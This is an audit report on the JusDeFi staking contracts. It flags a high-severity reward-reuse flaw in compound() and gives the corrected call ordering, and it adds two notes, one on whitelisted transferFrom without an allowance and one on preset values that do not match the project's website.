JusDeFi smart contract security audit report performed by Callisto Security Audit Department
JusDeFi is a next-generation yield farming experiment, combining some of the most exciting features from today’s biggest players in DeFi with revolutionary new tokenomics. Participants can stake JDFI tokens directly (or to stake LP for even larger rewards) and our unique fee structure powers the burn and buyback systems which in turn drive price action. Whenever you unstake your JDFI, a fee will be charged. Half goes into the staking rewards pool, and the other half is burned. This unstaking fee is dynamic, and changes weekly based on community governance.
Commit hash d2dbfc8f0d2cff1f0ffca9153de509da59c79aec
Include:
- AirdropToken.sol
- DevStakingPool.sol
- FeePool.sol
- JDFIStakingPool.sol
- JusDeFi.sol
- StakingPool.sol
- UNIV2StakingPool.sol
- interfaces/IJDFIStakingPool.sol
- interfaces/IJusDeFi.sol
- interfaces/IStakingPool.sol
Exclude:
- test/JusDeFiMock.sol
- test/StakingPoolMock.sol
In total, 3 issues were reported including:
-
1 high severity issues.
-
2 notes.
In the function compound() user receives remaining ETH before clear reward. It allows attacker to use the same rewards many times for minting liquidity tokens.
Clear reward before send remaining ETH to user. https://github.com/jusdefi/jusdefi/blob/d2dbfc8f0d2cff1f0ffca9153de509da59c79aec/contracts/UNIV2StakingPool.sol#L61-L64
_clearRewards(msg.sender);
// return remaining ETH to sender
msg.sender.sendValue(msg.value - amountETH);
The function transferFrom in JusDeFi
allow to transfer from any address without allowance if msg.sender
is in whitelist. Two of three whitelisted addresses are JDFIStakingPool
and UNIV2StakingPool
which is part of codebase, but third address uniswapRouter
sets in constructor and is external contract which is not part of provided codebase. You have to be sure that uniswapRouter
passed security audit and have no issues.
The preset values of RESERVE_TEAM, RESERVE_JUSTICE, preminted JDFI/A do not match with appropriate values written on the https://www.jusde.fi/
The high severity issue was found that have to be fixed before deploying. Also, you have to pay attention on two notes pointed in this report.